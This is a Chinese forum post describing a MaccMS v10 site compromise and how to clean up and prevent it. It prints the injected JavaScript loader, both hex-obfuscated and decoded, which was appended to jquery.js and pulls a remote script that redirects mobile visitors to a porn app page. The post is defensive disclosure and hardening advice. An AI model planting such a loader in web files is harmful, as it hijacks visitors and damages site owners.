请选择 进入手机版 | 继续访问电脑版

苹果cms被挂广告处理方法以及防范方法

[复制链接]
查看454 | 回复0 | 2021-4-11 23:30:16 | 显示全部楼层 |阅读模式
最近本人的一个导航网,使用的是苹果cmsv10,手机访问的时候会触发定时任务,跳转至色情直播app,很是可恶,因为我进基本上不会去访问那个网址,所以好几个月后才发现,导致我网站一直没有被百度收录,所以找到后直接跟网警举报。

被植入的代码是这样的:
  1. ;var head=document.getElementsByTagName('head')[0];var script=document.createElement('script');script['src']='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73';head.appendChild(script);
复制代码
编译后:
  1. var head=document.getElementsByTagName('head')[0];
  2. var script=document.createElement('script');
  3. script['src']='https://maccms.z23.web.core.windows.net/732d.js';
  4. head.appendChild(script);
复制代码
我们看到是执行了一个外部的js《https://maccms.z23.web.core.windows.net/732d.js》查看后发现是一个简单的跳转js,检测为手机用户便跳转至


013339fyxfmpzxwtt3ft1f.png
这样一个色情app下载页面。


代码被植入到了static/js/jquery.js文件中的最后一行。



被挂马处理方法:


如果你的网站也出现了跳转到其他网站的情况便可按照这种方法进行查找,清理,如果实在找不到可以删除所有文件重新安装,然后恢复数据库,恢复配置文件即可。

数据库恢复我不用多说,直接备份重新导入即可,配置文件的话我截图给大家看

013737k25n2bb23c3vca3v.png

上图这些文件里面保存了你网站的seo设置  分类设置  播放器设置等等...,重新安装好的网站吧这些文件替换回去登录后台你会发现后台跟你以前一样,无需重新配置。



防止被挂马的方法:

1.js能用cnd的全部用cdn,即可仿篡改也可加速网站访问速度,不能放的创建一个静态空间设置权限为只读,吧js全部放进去在引用

免费cdn提供商
http://www.bootcdn.cn/        国内        稳定、快速、免费的开源项目 CDN 服务
https://developers.google.com/speed/libraries/        国外        资源丰富
http://cdn.code.baidu.com/        国内        资源丰富
https://www.staticfile.org/        国内        七牛静态资源公共库
http://jscdn.upai.com/        国内        又拍云静态资源公共库


2.吧模板文件以及前端用到的相关文件权限全部设置为只读,如下图

014558w8njt083j3g3g0ow.png

其他如果不需要写入权限的文件也尽量关闭掉写入权限

3.宝塔面板如果是收费用户的尽量吧防篡改开启,效果更好。

如果还有什么好意见欢迎大家分享。
回复

使用道具 举报

快捷回复
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则